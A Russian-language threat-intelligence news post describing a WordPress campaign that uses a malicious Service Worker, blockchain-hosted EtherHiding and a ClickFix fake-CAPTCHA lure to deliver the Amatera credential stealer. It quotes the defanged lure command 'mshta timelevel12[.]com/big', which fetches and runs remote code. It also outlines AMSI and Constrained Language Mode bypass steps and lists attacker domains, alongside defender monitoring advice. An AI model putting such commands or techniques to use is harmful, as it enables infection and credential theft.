Массовая атака на WordPress: Service Worker доставляет стилер через ClickFix

Массовая кампания по компрометации сайтов на платформе WordPress заражает сотни ресурсов с помощью вредоносного must-use-плагина. Он регистрирует постоянный Service Worker, который перехватывает управление страницами посетителей, удаляет механизмы защиты Content-Security-Policy и внедряет вредоносный скрипт.

Как работает заражение

Скрипт активируется только для незарегистрированных пользователей. Чтобы не привлекать внимание администраторов, вредоносный код не работает на страницах входа в WordPress и в административных разделах. Кроме того, исключаются аутентифицированные сессии и тестовый cookie, которым управляет оператор кампании.

Service Worker сохраняется в браузерах даже после очистки заражения на стороне сервера. Поэтому для устранения последствий необходимо отменить его регистрацию и удалить связанные с ним кэши.

EtherHiding и приманка ClickFix

Внедренный скрипт использует ethers.js для чтения данных из смарт-контракта в блокчейне Base. Контракт расположен по адресу 0x58460d0b3d4d6b03761c89120393c0c676676496 и хранит активную полезную нагрузку, включая поддельную страницу reCAPTCHA.

Атака использует технику EtherHiding с механизмом on-chain dead-drop. Приманка предлагает пользователям Windows скопировать и выполнить команду mshta timelevel12[.]com/big через диалоговое окно «Выполнить». Пользователи других операционных систем получают безвредную отвлекающую информацию.

Эта схема относится к технике ClickFix. Она предполагает ручное выполнение команды жертвой и за счет этого помогает обходить стандартное сканирование вложений и загружаемых файлов.

Запуск PowerShell и обход AMSI

HTA-нагрузка декодирует команду, которая создает скрытую запланированную задачу с именем serviceerg через COM-интерфейс Schedule.Service. Задача запускает PowerShell, используя замаскированный путь с подстановочным символом и закодированную команду.

На следующем этапе PowerShell обходит Constrained Language Mode, модифицирует amsiContext для отключения сканирования AMSI, выполняет профилирование хоста и запускает последующий код в памяти.

Загрузка Emmenhtal и Amatera

PowerShell загружает загрузчик Emmenhtal с домена gpuh[.]gravityzone[.]army, используя User-Agent, имитирующий браузер. Затем Emmenhtal извлекает встроенную нагрузку из JPEG-файла, размещенного на i.ibb[.]co, и загружает ее в память как PE-файл с помощью рефлексивной загрузки. Исполняемый файл при этом не сохраняется на диске.

Финальная полезная нагрузка, Amatera, также известная как ребрендинг ACR Stealer/AcridRain, маскируется через метаданные под WPA.exe. Она крадет учетные данные и системную информацию, устанавливает корневой сертификат и взаимодействует с gw[.]proxyvector[.]cc по TLS.

Разрешение DNS выполняется через провайдеров DNS-over-HTTPS, включая Google и Cloudflare. Это скрывает запросы к C2 внутри зашифрованного DNS-трафика.

Что отслеживать специалистам по ИБ

Для выявления активности кампании специалистам по защите информации рекомендуется отслеживать:

  • указанную инфраструктуру;
  • активность смарт-контрактов в блокчейне Base;
  • подозрительное выполнение mshta;
  • скрытые запланированные задачи;
  • вмешательство в AMSI;
  • регистрацию Service Worker;
  • трафик браузера к конечным точкам Base RPC.

Отчет получен из сервиса CTT Report Hub. Права на отчет принадлежат его владельцу.

Ознакомиться подробнее с отчетом можно по ссылке.

Технологии киберугроз
Автор: Технологии киберугроз
Технологии киберугроз – технологическая компания, специализирующаяся на решениях по анализу угроз для предприятий любого размера. Мы собираем, нормализуем, обогащаем информацию о киберугрозах со всего мира. Нашими источниками являют более 260 открытых фидов, более 100 открытых поставщиков Threat Intelligence-отчетов, открытые online sandbox, социальные сети и репозитории GitHub. Мы также предоставляем ряд сервисов по: семантическом анализу Threat Intelligence-отчетов и приведения их в машиночитаемый формат STIX 2.1, проверки IoC на потенциальные ложноположительные сработки, а также получению WHOIS-записей для доменных имен.
Комментарии: